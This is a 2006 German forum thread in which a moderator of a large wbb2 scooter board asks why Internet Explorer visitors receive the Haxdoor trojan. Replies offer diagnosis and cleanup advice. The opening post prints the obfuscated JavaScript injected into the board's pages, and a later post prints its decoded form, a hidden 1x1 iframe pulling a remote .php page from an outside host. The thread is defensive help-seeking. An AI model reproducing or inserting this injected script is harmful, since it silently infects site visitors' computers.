Trojaner von Seite

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von coolzero, 3. Mai 2006 .

Schlagworte:
  1. 3. Mai 2006
    Hi und zwar haben wir ein riesen großes Problem.
    Jeder der mit dem IE auf unsere Seite geht kriegt einen Trojaner BDS Haxdoor.GJ.1. , ich versteh bloß nicht wie das gehen soll.
    Es handelt sich um die Seite RollerTuningPage | Roller & Motorroller Forum , und im quellcode steht ganz unten aufeinmal das hier 2 mal , gestern stands nur 1 mal drin, heißt irgendeiner hats reinkopiert.
    Könnt ihr mir mal sagen was das heißt und wie das sein das jeder einen Trojaner kriegt der mit IE draufgeht diesen verdammten trojaner kriegt. Es ist sehr wichtig da es eine 28000 User Community ist.
    Kann mir mal ganz genau einer sagen was das heißt? und wie das sein kann, das Forum ist immoment im Wartemodus.
    Und in welcher Datei vom Board ist es geschrieben wenn es ganz unten steht im quelltext.


    <SCRIPT LANGUAGE="JavaScript">
    <!--
    function Decode()
    {
    var temp="",i,c=0,out="";
    var str="60!105!102!114!97!109!
    101!32!115!114!99!61!104!
    116!116!112!58!47!47!120!45!
    114!111!97!100!46!99!111!46!
    107!114!47!114!105!99!104!47!
    111!117!116!46!112!104!112!32!
    119!105!100!116!104!61!49!32!104!
    101!105!103!104!116!61!49!62!60!47!
    105!102!114!97!109!101!62!";

    l=str.length;

    while(c<=str.length-1)
    {
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
    }
    document.write(out);
    }
    //-->
    </SCRIPT><SCRIPT LANGUAGE="JavaScript">
     
  2. 3. Mai 2006
    ist warscheinlich ein javascript virus der wiederum was ausm netz herunterläd...einfach code entfernen...

    vlt hast du irgendwo im php schwachstellen oder jemand anderes hat zugang zu deiner homepage...

    mfg moep
     
  3. 3. Mai 2006
    Ohman, also ich bin da nur Mod und immoment ist es sehr schwer den richtigen admin zu kriegen.
    Und den Code entfernen wär ja gut, bloß muss ich den ja in diesen wbb2 tabellen oder so suchen.
    Man kann ja nicht einfach den quelltext ändern, ist ja ein wbb2 board.
    Was steht den in diesen 60!105!102!114!97!109 dingern.
    Wäre nett zu wissen von welcher seite und so er das runterläd, weil es eben eine Riesige seite ist und wir sowas verhindern wollen.
    Was aber komisch ist, das nur IE leute betroffen sind.
    Und unten Rechts sind aufeinmal diese 2 dinger, ist wahrscheinlich dieser code, der baut auch irgendwie immer eine verbindung hierzu auf <iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
    {bild-down: http://img49.imageshack.us/img49/4687/screenirtp1vj.jpg}
     
  4. 3. Mai 2006
    "var str="60!105!102!114!97!109!
    101!32!115!114!99!61!104!
    116!116!112!58!47!47!120!45!
    114!111!97!100!46!99!111!46!
    107!114!47!114!105!99!104!47!
    111!117!116!46!112!104!112!32!
    119!105!100!116!104!61!49!32!104!
    101!105!103!104!116!61!49!62!60!47!
    105!102!114!97!109!101!62!";
    "
    Das is ShellCode der wahrscheinlich Viren runterlädt

    Achja, das wird - denke ich - nich inner Tabelle stehen, sondern in der PHP-Datei (Man kann auch beim PHP-Board die dateien verändern)

    achja, zum IE: Vllt. greift das ding ne IE-Schwachstelle an, die Firefox/Opera nicht haben?
     
  5. 3. Mai 2006
    Kannste mir mal sagen wo ich den Code finde bis ich ihn entfernen kann.
    Ist ein normales wbb2 board, ältere version 2.3.2, haben kein phpmyadmin zugang nur admin rechte im board.
     
  6. 3. Mai 2006
    leider hat der code meinem ie nicht das geringste antun können , aber wenn du bei google nach dem virus suchst wirst du fündig.das ganze board deswegen offline setzen ist schon eine drastische maßnahme , ein gefixter ie ist auch gegen den wurm imun , jedenfalls meiner.....

    hilfe gibt es hier

    BDS/Haxdoor.GJ.1? - Trojaner-Board
    http://www.avira.com/en/threats/section/vdfhistory/vdf_no/6.33.00.183/6.33.00.183.html




    Side effects:
    • Drops malicious files
    • Records keystrokes
    • Registry modification
    • Steals information
    • Third party control
     
  7. 3. Mai 2006
    denke mal das wird das werk eines hackers sein (wenn ichs mal so nennen kann) dein board scheint recht groß zu sein...

    evtl gibts noch weiter backdoors für den hacker z.b. inner php datei irgendwo (aufspüren könnte schwierig werden)

    versuchs damit


    - bei privilegierten accounts im wbb das pw löschen

    wenn das nix hilft versuch das


    speichere vom board den sqldump und spiele wbb neu auf (am besten ne aktuelle version (2.3.4 gibts unten im board) die 2.3.2 hat übrigens bugs die das ausführen von code erlauben) so könnte auch der hacker diesen javascriptvirus plaziert haben
     
  8. 3. Mai 2006
    Das passiert auch nur wenn das board nicht im wartemodus ist.
    Wie man auf dem Screenshots sieht sind die dinger nur da wenn man angemeldet ist, und im quelltext vom wartemodus ist der script weg.


    EDIT:

    Dankeschön, wie gesagt besteht immoment kein Kontakt zum Server Admin, heißt wir sind immoment sowieso hilflos, bis der Admin eben mal wieder da ist ... was noch lange dauern kann.
    Achja wegen der Größte Mitglieder: 28.208 | Themen: 255.160 | Beiträge: 2.278.167 (durchschnittlich 1.441,08 Beiträge/Tag) , und Lizenz usw haben wir ja, mal beten das der admin nicht nur 4 mal im Jahr kommt.
     
  9. 3. Mai 2006
    Richtig, ich bin nur Moderator, aber wir versuchen alle dieses kackding da wegzukriegen bzw das ding zu suchen.
    Wir haben 2 Admins, einer ist Admin vom Wbb2 der ist aktiv dabei und sucht mit, leider hat er nicht soviel ahnung davon.
    Der andere Admin gehört die Seite und der Server, wir können keine Backups zurückspielen solang er nicht da ist, und das letzte mal war vor nem monat oder so.
    Heißt wir haben im WBB2 Admin rechte aber können nix auf dem Server machen (phpmyadmin usw)

    Nur er weiß nicht wo er suchen soll das er wenigestens den Trojaner rauskriegt.
    Der Rest ist erstmal egal ob der noch andere sachen hat, nur eben der trojaner.
    Und was noch komisch ist, im Mod Bereich hab ich manchmal das hier stehen
    (Benutzer im Forum aktiv: coolzero und 1 Besucher) , was soll das den
     
  10. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.